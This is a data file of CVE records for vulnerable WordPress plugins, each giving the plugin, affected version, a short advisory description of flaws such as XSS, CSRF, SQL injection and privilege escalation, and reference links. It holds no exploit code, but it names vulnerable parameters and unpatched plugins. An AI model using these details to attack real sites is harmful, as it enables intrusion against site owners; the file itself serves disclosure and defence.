{"CVE_ID":"CVE-2024-8047","slug":"visual-sound-widget-for-soundcloud-and-artistplugme-visualdreams","versionImpact":"1.06","description":"The Visual Sound (old) WordPress plugin through 1.06 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0ae1474c-9193-48ee-8cf6-d19900ad95f4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0ae1474c-9193-48ee-8cf6-d19900ad95f4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-23867","slug":"wpfilesearch","versionImpact":"1.2","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NotFound WordPress File Search allows Reflected XSS. This issue affects WordPress File Search: from n\/a through 1.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wpfilesearch\\\/vulnerability\\\/wordpress-wordpress-file-search-plugin-1-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wpfilesearch\\\/vulnerability\\\/wordpress-wordpress-file-search-plugin-1-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13328","slug":"giga-messenger-bots","versionImpact":"2.3.1","description":"The Giga Messenger  WordPress plugin through 2.3.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/543a209b-c43c-46fc-8369-edb3b7e0ca98\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/543a209b-c43c-46fc-8369-edb3b7e0ca98\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0866","slug":"legoeso-pdf-manager","versionImpact":"1.2.2","description":"The Legoeso PDF Manager plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018checkedVals\u2019 parameter in all versions up to, and including, 1.2.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Author-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/legoeso-pdf-manager\\\/trunk\\\/inc\\\/admin\\\/class-pdf-doc-list-table.php#L543\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/legoeso-pdf-manager\\\/trunk\\\/inc\\\/admin\\\/class-pdf-doc-list-table.php#L543\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/legoeso-pdf-manager\\\/trunk\\\/inc\\\/admin\\\/class-pdf-doc-list-table.php#L567\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/legoeso-pdf-manager\\\/trunk\\\/inc\\\/admin\\\/class-pdf-doc-list-table.php#L567\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/legoeso-pdf-manager\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/legoeso-pdf-manager\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e640767-7998-4404-a894-0b1794464c66?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e640767-7998-4404-a894-0b1794464c66?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3867","slug":"ajax-comment-form-cst","versionImpact":"1.2","description":"The Ajax Comment Form CST plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2. This is due to missing or incorrect nonce validation via the 'acform_cst_settings' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ajax-comment-form-cst\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ajax-comment-form-cst\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a001b31-042d-451b-ad9e-df8d41d3c2b0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a001b31-042d-451b-ad9e-df8d41d3c2b0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13865","slug":"drm-protected-video-streaming","versionImpact":"4.2.1","description":"The S3Player  WordPress plugin through 4.2.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against only unauthenticated users.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9cc7c5cb-983f-4593-abc5-7e224b275a23\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9cc7c5cb-983f-4593-abc5-7e224b275a23\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-30977","slug":"chaport","versionImpact":"1.1.5","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Chaport Live Chat WP Live Chat + Chatbots Plugin for WordPress \u2013 Chaport allows Stored XSS. This issue affects WP Live Chat + Chatbots Plugin for WordPress \u2013 Chaport: from n\/a through 1.1.5.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/chaport\\\/vulnerability\\\/wordpress-wp-live-chat-chatbots-plugin-for-wordpress-chaport-1-1-5-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/chaport\\\/vulnerability\\\/wordpress-wp-live-chat-chatbots-plugin-for-wordpress-chaport-1-1-5-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8688","slug":"inline-stock-quotes","versionImpact":"0.2","description":"The Inline Stock Quotes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's stock shortcode in all versions up to, and including, 0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/inline-stock-quotes\\\/trunk\\\/inline-quotes.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/inline-stock-quotes\\\/trunk\\\/inline-quotes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/inline-stock-quotes\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/inline-stock-quotes\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93ab3e05-dbaf-4f55-a411-793a74c75071?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93ab3e05-dbaf-4f55-a411-793a74c75071?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5338","slug":"theme-blvd-shortcodes","versionImpact":"1.6.8","description":"The Theme Blvd Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 1.6.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88809668-ea6b-41df-b2a7-ffe03a931c86?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88809668-ea6b-41df-b2a7-ffe03a931c86?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/theme-blvd-shortcodes\\\/tags\\\/1.6.8\\\/includes\\\/class-tb-column-shortcode.php#L97\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/theme-blvd-shortcodes\\\/tags\\\/1.6.8\\\/includes\\\/class-tb-column-shortcode.php#L97\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1278","slug":"easy-facebook-likebox","versionImpact":"6.5.4","description":"The Easy Social Feed \u2013 Social Photos Gallery \u2013 Post Feed \u2013 Like Box plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'efb_likebox' shortcode in all versions up to, and including, 6.5.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b76bddf3-96ad-4bb0-a37b-33b451da6713?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b76bddf3-96ad-4bb0-a37b-33b451da6713?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-facebook-likebox\\\/tags\\\/6.5.4\\\/facebook\\\/frontend\\\/easy-facebook-likebox.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-facebook-likebox\\\/tags\\\/6.5.4\\\/facebook\\\/frontend\\\/easy-facebook-likebox.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3723","slug":"advanced-cf7-db","versionImpact":"2.0.2","description":"The Advanced Contact form 7 DB plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.0.2 via the wp-content\/uploads\/advanced-cf7-upload directory. This makes it possible for unauthenticated attackers to extract sensitive data uploaded via this plugin through a form.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9a1f1a1-4f0a-48b5-80c8-525b69006863?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9a1f1a1-4f0a-48b5-80c8-525b69006863?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/advanced-cf7-db\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/advanced-cf7-db\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7854","slug":"woo-inquiry","versionImpact":"0.1","description":"The Woo Inquiry plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 0.1 due to insufficient escaping on the user supplied parameter 'dbid' and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/312a6601-c914-4661-82ff-6f8bac849442?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/312a6601-c914-4661-82ff-6f8bac849442?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-inquiry\\\/trunk\\\/includes\\\/functions.php?rev=2088873#L307\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-inquiry\\\/trunk\\\/includes\\\/functions.php?rev=2088873#L307\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8044","slug":"infolinks-ad-wrap","versionImpact":"1.0.2","description":"The infolinks Ad Wrap WordPress plugin through 1.0.2 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/14b42ba8-7a8b-4fbf-86fb-6095879ec05c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/14b42ba8-7a8b-4fbf-86fb-6095879ec05c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9587","slug":"linkz-ai","versionImpact":"1.1.8","description":"The Linkz.ai plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ajax_linkz' function in versions up to, and including, 1.1.8. This makes it possible for authenticated attackers with contributor-level privileges or above, to update plugin settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1faa178-e4b1-4d2e-85f1-b852fbf3ab17?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1faa178-e4b1-4d2e-85f1-b852fbf3ab17?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/linkz-ai\\\/tags\\\/1.1.8\\\/init.php#L252\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/linkz-ai\\\/tags\\\/1.1.8\\\/init.php#L252\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8627","slug":"ultimate-tinymce","versionImpact":"5.7","description":"The Ultimate TinyMCE plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'field' shortcode in all versions up to, and including, 5.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ddd9cab-f381-4343-a2e6-ef8a1be2ed4e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ddd9cab-f381-4343-a2e6-ef8a1be2ed4e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-tinymce\\\/trunk\\\/admin_functions.php#L81\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-tinymce\\\/trunk\\\/admin_functions.php#L81\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-23535","slug":"drag-and-drop-custom-sidebar","versionImpact":"0.1","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in clickandsell REAL WordPress Sidebar allows Stored XSS. This issue affects REAL WordPress Sidebar: from n\/a through 0.1.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/drag-and-drop-custom-sidebar\\\/vulnerability\\\/wordpress-real-wordpress-sidebar-plugin-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/drag-and-drop-custom-sidebar\\\/vulnerability\\\/wordpress-real-wordpress-sidebar-plugin-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13327","slug":"musicbox","versionImpact":"2.0.3","description":"The Musicbox WordPress plugin through 2.0.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/abc8f3e1-2aee-44f0-8ecd-0ea424c0540a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/abc8f3e1-2aee-44f0-8ecd-0ea424c0540a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6432","slug":"custom-post-widget","versionImpact":"3.3.5","description":"The Content Blocks (Custom Post Widget) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018content\u2019 parameter within the plugin's shortcode Content Block in all versions up to, and including, 3.3.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-post-widget\\\/trunk\\\/shortcode.php#L73\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-post-widget\\\/trunk\\\/shortcode.php#L73\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3146407\\\/#file6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3146407\\\/#file6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147521\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147521\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/custom-post-widget\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/custom-post-widget\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f784dfa-5c31-4c44-9230-7beac7f56893?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f784dfa-5c31-4c44-9230-7beac7f56893?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11847","slug":"wp-svg-upload","versionImpact":"1.0.0","description":"The wp-svg-upload WordPress plugin through 1.0.0 does not sanitize SVG file contents, which enables users with at least the author role to SVG with malicious JavaScript to conduct Stored XSS attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f57ecff2-0cff-40c7-b6e4-5b162b847d65\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f57ecff2-0cff-40c7-b6e4-5b162b847d65\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3866","slug":"add-google-plus-one-social-share-button","versionImpact":"1.0.0","description":"The Add Google +1 (Plus one) social share Button plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.0. This is due to missing or incorrect nonce validation on the google-plus-one-share-button page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-google-plus-one-social-share-button\\\/tags\\\/1.0.0\\\/gp_admin_page.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-google-plus-one-social-share-button\\\/tags\\\/1.0.0\\\/gp_admin_page.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/add-google-plus-one-social-share-button\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/add-google-plus-one-social-share-button\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/190a3b11-c6ca-4666-8c7f-b22bb4a4961d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/190a3b11-c6ca-4666-8c7f-b22bb4a4961d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13828","slug":"badgearoo","versionImpact":"1.0.14","description":"The Badgearoo WordPress plugin through 1.0.14 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0f901807-9ef2-4cd3-969a-9fd23a8da371\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0f901807-9ef2-4cd3-969a-9fd23a8da371\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-30938","slug":"broadly","versionImpact":"3.0.2","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in broadly Broadly for WordPress allows Stored XSS. This issue affects Broadly for WordPress: from n\/a through 3.0.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/broadly\\\/vulnerability\\\/wordpress-broadly-for-wordpress-3-0-2-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/broadly\\\/vulnerability\\\/wordpress-broadly-for-wordpress-3-0-2-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8685","slug":"wp-chart-generator","versionImpact":"1.0.4","description":"The Wp chart generator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpchart shortcode in all versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/wp-chart-generator\\\/trunk\\\/wp-chart.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/wp-chart-generator\\\/trunk\\\/wp-chart.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-chart-generator\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-chart-generator\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25302010-202a-458e-93b6-2e6b8604c091?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25302010-202a-458e-93b6-2e6b8604c091?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2833","slug":"reviewx","versionImpact":"1.6.13","description":"The ReviewX plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 1.6.13 due to insufficient restriction on the 'rx_set_screen_options' function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to modify their user role by supplying the 'wp_screen_options[option]' and 'wp_screen_options[value]' parameters during a screen option update.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2916148%40reviewx&old=2912114%40reviewx&sfp_email=&sfph_mail=#file472\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2916148%40reviewx&old=2912114%40reviewx&sfp_email=&sfph_mail=#file472\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70e1d701-2cff-4793-9e4c-5b16a4038e8d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70e1d701-2cff-4793-9e4c-5b16a4038e8d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2023\\\/05\\\/wpdeveloper-addresses-privilege-escalation-vulnerability-in-reviewx-wordpress-plugin\\\/\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2023\\\/05\\\/wpdeveloper-addresses-privilege-escalation-vulnerability-in-reviewx-wordpress-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/lana.codes\\\/lanavdb\\\/a889c3ff-5df0-4d7e-951f-0b0406468efa\\\/\",\"name\":\"https:\\\/\\\/lana.codes\\\/lanavdb\\\/a889c3ff-5df0-4d7e-951f-0b0406468efa\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/reviewx\\\/tags\\\/1.6.13\\\/includes\\\/rx-functions.php#L972\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/reviewx\\\/tags\\\/1.6.13\\\/includes\\\/rx-functions.php#L972\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0551","slug":"rest-api-to-miniprogram","versionImpact":"4.6.1","description":"The REST API TO MiniProgram WordPress plugin through 4.6.1 does not have authorisation and CSRF checks in an AJAX action, allowing ay authenticated users, such as subscriber to call and delete arbitrary attachments","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/de162a46-1fdb-47b9-9a61-f12a2c655a7d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/de162a46-1fdb-47b9-9a61-f12a2c655a7d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1782","slug":"blue-triad-ezanalytics","versionImpact":"1.0","description":"The Blue Triad EZAnalytics plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'bt_webid' parameter in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0cae2bb8-33e7-47b0-861d-b976a67660ae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0cae2bb8-33e7-47b0-861d-b976a67660ae?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blue-triad-ezanalytics\\\/trunk\\\/blue-triad-ezanalytics.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blue-triad-ezanalytics\\\/trunk\\\/blue-triad-ezanalytics.php\",\"refsource\":\"\",\"tags\":[]}]"}
